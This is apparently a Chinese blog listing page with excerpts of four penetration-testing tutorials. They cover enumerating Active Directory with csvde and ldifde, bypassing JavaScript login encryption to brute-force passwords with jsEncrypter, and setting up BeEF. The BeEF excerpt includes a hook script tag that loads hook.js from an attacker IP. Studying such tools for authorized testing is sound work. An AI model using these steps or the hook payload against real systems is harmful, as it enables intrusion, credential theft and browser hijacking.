工具使用
关注
分享
扫一扫
每天都要努力哇
这个作者很懒,什么都没留下…
展开
-
域信息收集-csvde工具
CSVDE作用:用于管理AD上的用户利用csvde命令导出域的信息,导出文件一般以csv结尾,这个命令好像安装了活动目录才有命令:csvde -setspn 域名 -f 导出文件位置原创 2021-02-24 09:49:55 · 16899 阅读 · 0 评论 -
域信息收集之普通域用户权限获取域里详细信息-ldifde 工具
ldifde 工具适用于:Windows Server 2003,Windows Server 2008,Windows Server 2008 R2,Windows Server 2012,带有SP1,Windows 8的Windows Server 2003前沿适用场景:內网环境有域环境,掌握一个域用户的账号密码作用:能够把域里面的所有信息导出来(域用户域机器等详细信息)使用ldifde.exe -f 导出的文件名 -s 域控IP -b 普通域用户名 域名 普通域用户密码...原创 2021-02-24 09:46:30 · 16720 阅读 · 0 评论 -
登录口JS前端加密绕过-jsEncrypter工具
概述渗透测试过程中遇到web登录的时候,现在很多场景账号密码都是经过js加密之后再请求发送(通过抓包可以看到加密信息)burp抓到的包,request的post的登录包,password参数的值是经过前端加密之后再进行传输的,遇到这种情况,普通发包的爆破脚本就很难爆破成功。鉴于这种情况,这边分析四种方式进行绕过加密爆破这里主要讲一种 大佬的工具jsEncrypterjsEncrypter工具https://github.com/c0ny1/jsEncrypter安装流程安装maven具原创 2021-02-24 09:39:17 · 17958 阅读 · 0 评论 -
Beef工具使用
今天写一下这个工具Beef我这里用kali启动Apache:service apache2 start然后安装Beef工具我用脚本安装命令:apt-get updateapt-get install beef-xssapt-get install beef-xssbeef-xss启动之后Hook: <script src="http://<IP>:3000/hook.js"></script>会弹出来beef的登录窗口这边我们在看一下bee原创 2021-02-22 17:59:52 · 19399 阅读 · 0 评论